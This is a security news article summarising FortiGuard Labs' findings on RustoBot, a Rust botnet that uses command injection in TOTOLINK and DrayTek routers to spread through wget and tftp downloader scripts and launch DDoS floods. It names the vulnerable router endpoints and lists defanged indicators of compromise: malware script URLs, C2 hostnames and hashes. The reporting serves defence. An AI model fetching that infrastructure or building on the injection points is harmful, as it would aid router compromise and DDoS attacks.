Wednesday, May 7, 2025
HomeBotnetNew Rust-Based Botnet Hijacks Routers to Inject Remote Commands

New Rust-Based Botnet Hijacks Routers to Inject Remote Commands

Published on

SIEM as a Service

Follow Us on Google News

A new malware named “RustoBot” has been discovered exploiting vulnerabilities in various router models to gain unauthorized access and initiate Distributed Denial of Service (DDoS) attacks.

This advanced cyber-threat, first observed in January to February 2025, targets TOTOLINK and DrayTek devices, showcasing sophisticated techniques unlike previously known malware.

Exploitation and Spread Strategy

The botnet leverages multiple command injection vulnerabilities, primarily residing in TOTOLINK’s cstecgi.cgi script and DrayTek’s cgi-bin/mainfunction.cgi/apmcfgupload interface.

- Advertisement - Google News

These vulnerabilities allow attackers to run arbitrary system commands remotely.

RustoBot uses several downloader scripts utilizing common commands like wget and tftp to propagate itself across devices with different architectures, including arm5, arm6, arm7, mips, mpsl, and x86.

Rust-Based Botnet
RustoBot entry point

Upon infection, RustoBot employs encryption to obfuscate its configuration, using the XOR algorithm with complex calculations to retrieve keys for decoding ciphertext.

This approach helps the malware evade detection by standard security systems.

Once decoded, the configuration assists in resolving command and control (C2) server domains and executing DDoS attacks.

The malware’s entry point, identified through reverse engineering, demonstrates a high level of sophistication, using system API offsets to perform its malicious behaviors.

Rust-Based Botnet
Decoder key

DDoS Capabilities and Command Structure

RustoBot supports a variety of DDoS attack methods, including Raw IP, TCP, and UDP flooding.

It receives attack parameters from the C2 server, initiating attacks based on predefined commands.

For example, the 0x03 command triggers a UDP flood attack, specifying victim IP addresses, port numbers, attack duration, and packet lengths.

This structured command system enables attackers to coordinate significant disruptions with precision.

The malware campaigns were observed in Japan, Taiwan, Vietnam, and Mexico, targeting the technology sector.

The attacks not only compromise the security of the affected devices but also pose a significant risk to the operational integrity of businesses relying on these internet gateways.

To combat this threat, FortiGuard Labs has integrated multiple protective measures into its security solutions, including:

  • Antivirus Services: FortiGuard Antivirus detects and blocks RustoBot under signatures like BASH/Mirai.AEH!tr.dldr and ELF/Mirai variations.
  • Web Filtering: Blocks the C2 server connections.
  • IPS Signatures: Offers protection against vulnerabilities exploited by RustoBot.

According to the Report, Fortinet advises organizations to strengthen endpoint monitoring and authentication, alongside considering training through their Fortinet Certified Fundamentals (FCF) in Cybersecurity.

This comprehensive approach by FortiGuard Labs ensures a robust defense against the emerging threat of RustoBot, urging all stakeholders in the cybersecurity community to remain vigilant and proactive.

Table of Indicators of Compromise (IOCs)

TypeValue
URLhxxp://66[.]63[.]187[.]69/w.sh
URLhxxp://66[.]63[.]187[.]69/wget.sh
URLhxxp://66[.]63[.]187[.]69/tftp.sh
Hostdvrhelper[.]anondns[.]net, techsupport[.]anondns[.]net, rustbot[.]anondns[.]net
IP5[.]255[.]125[.]150
File Hash76a487a46cfeb94eb5a6290ceffabb923c35befe71a1a3b7b7d67341a40bc454, 75d031e8faaf3aa0e9cafd5ef0fd7de1a2a80aaa245a9e92bae6433a17f48385, …

Find this News Interesting! Follow us on Google NewsLinkedIn, & X to Get Instant Updates!

Aman Mishra
Aman Mishra
Aman Mishra is a Security and privacy Reporter covering various data breach, cyber crime, malware, & vulnerability.

Latest articles

BFDOOR Malware Targets Organizations to Establish Long-Term Persistence

The BPFDoor malware has emerged as a significant threat targeting domestic and international organizations,...

Uncovering the Security Risks of Data Exposure in AI-Powered Tools like Snowflake’s CORTEX

As artificial intelligence continues to reshape the technological landscape, tools like Snowflake’s CORTEX Search...

UNC3944 Hackers Shift from SIM Swapping to Ransomware and Data Extortion

UNC3944, a financially-motivated threat actor also linked to the group known as Scattered Spider,...

Over 2,800 Hacked Websites Targeting MacOS Users with AMOS Stealer Malware

Cybersecurity researcher has uncovered a massive malware campaign targeting MacOS users through approximately 2,800...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

BFDOOR Malware Targets Organizations to Establish Long-Term Persistence

The BPFDoor malware has emerged as a significant threat targeting domestic and international organizations,...

Uncovering the Security Risks of Data Exposure in AI-Powered Tools like Snowflake’s CORTEX

As artificial intelligence continues to reshape the technological landscape, tools like Snowflake’s CORTEX Search...

UNC3944 Hackers Shift from SIM Swapping to Ransomware and Data Extortion

UNC3944, a financially-motivated threat actor also linked to the group known as Scattered Spider,...